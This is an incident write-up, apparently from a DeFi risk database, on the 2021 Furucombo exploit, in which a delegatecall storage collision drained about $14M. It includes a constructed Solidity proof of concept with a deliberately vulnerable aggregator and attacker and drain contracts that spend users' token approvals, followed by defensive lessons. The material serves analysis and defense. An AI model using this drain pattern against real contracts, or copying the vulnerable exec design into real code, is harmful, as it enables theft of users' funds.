Furucombo: Evil Contract — Delegatecall Storage Collision
An attacker exploited Furucombo's delegatecall architecture to overwrite its proxy's implementation slot with a malicious contract, draining $14M from users who had granted unlimited token approvals.
Summary #
Furucombo, a DeFi aggregator / transaction composer, was exploited on 2021-02-27, resulting in a loss of approximately $14M.
What happened #
An attacker exploited Furucombo's delegatecall architecture. Furucombo's proxy delegatecalled into targets taken from its handler registry, so any code reached that way ran with Furucombo's storage and Furucombo's address. One whitelisted target was itself a proxy whose initialization logic writes an implementation address into a storage slot; invoked via delegatecall, that write landed in Furucombo's own storage (a storage collision), and the attacker used it to point Furucombo's implementation slot at a malicious contract. Subsequent calls through the same path were routed into that contract, which executed as Furucombo and called transferFrom against users who had granted Furucombo unlimited token approvals, draining about $14M.
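To make the mechanism concrete, the following Solidity sketch is an added example and is not Furucombo's source, its handler code, or the whitelisted third-party proxy; the contract names (Aggregator, UpgradeableProxy, Evil, Attacker), the storage-slot label and the function names are hypothetical, chosen only to show how a delegatecall into a whitelisted proxy turns that proxy's `initialize` into a write to the caller's storage.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed illustration of a delegatecall storage collision (not Furucombo's code).

interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// The aggregator: users approve tokens to it, and it delegatecalls whitelisted "handlers".
contract Aggregator {
    mapping(address => bool) public isHandler; // slot 0
    address public owner;                      // slot 1

    constructor() { owner = msg.sender; }

    function setHandler(address h, bool ok) external {
        require(msg.sender == owner, "not owner");
        isHandler[h] = ok;
    }

    // VULNERABLE: every whitelisted target runs with this contract's storage and identity.
    function exec(address target, bytes calldata data) external returns (bytes memory) {
        require(isHandler[target], "not a handler");
        (bool ok, bytes memory ret) = target.delegatecall(data);
        require(ok, "handler failed");
        return ret;
    }
}

// A third-party upgradeable proxy that was added to the handler whitelist.
// Its logic address lives in an unstructured slot; initialize() sets it only if the slot is empty.
contract UpgradeableProxy {
    bytes32 internal constant IMPL_SLOT = keccak256("example.proxy.implementation"); // hypothetical label

    function initialize(address logic) external {
        // Under delegatecall this reads the CALLER's slot, which is empty in the Aggregator.
        require(_impl() == address(0), "already initialized");
        _setImpl(logic);
    }

    function _impl() internal view returns (address a) {
        bytes32 s = IMPL_SLOT;
        assembly { a := sload(s) }
    }

    function _setImpl(address a) internal {
        bytes32 s = IMPL_SLOT;
        assembly { sstore(s, a) }
    }

    // Forwards any unknown selector to whatever address the slot currently holds.
    fallback() external payable {
        address impl = _impl();
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// Attacker-controlled logic. Reached through two nested delegatecalls, address(this) is the
// Aggregator, so transferFrom spends the approvals users granted to the Aggregator.
contract Evil {
    function drain(address token, address victim, address to, uint256 amount) external {
        IERC20(token).transferFrom(victim, to, amount);
    }
}

contract Attacker {
    function attack(Aggregator agg, address proxy, address evil,
                    address token, address victim, uint256 amount) external {
        // 1. initialize() runs on the Aggregator's storage: IMPL_SLOT there is empty,
        //    the check passes, and the Aggregator's slot now points at Evil.
        agg.exec(proxy, abi.encodeCall(UpgradeableProxy.initialize, (evil)));
        // 2. The proxy has no drain(), so its fallback reads IMPL_SLOT (now Evil, again from the
        //    Aggregator's storage) and delegatecalls it; drain() executes as the Aggregator.
        agg.exec(proxy, abi.encodeCall(Evil.drain, (token, victim, msg.sender, amount)));
    }
}
```

The defensive takeaway is that a delegatecall whitelist is a list of code that may rewrite the caller's storage: only handlers written for the aggregator's own storage layout belong on it, and a third-party upgradeable proxy never does, because its initializer and fallback both read and write a slot that is unset in the caller. Routing to external protocols should use `call` from a handler, not a delegatecall into the protocol's proxy.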
Linked factors #
- RD-F-001 — causal : ★ Direct: Audit scope mismatch (report commit ≠ deployed bytecode) [via cross-hack: Factor 1: Audit Scope Mismatch]
- RD-F-007 — causal : Direct: bug bounty presence + max payout [via cross-hack: Factor 9: No Bug Bounty Program] || Bug bounty absent — baseline integrity gap [via dashboard_risk_factors/Bug bounty: Unknown]
- RD-F-012 — causal : delegatecall with user-controlled target [via cross-hack: Factor 22: Delegatecall-to-Proxy in Handler Registry]
- RD-F-039 — related : ★ delegatecall in proposal execution path [via cross-hack: Factor 22: Delegatecall-to-Proxy in Handler Registry]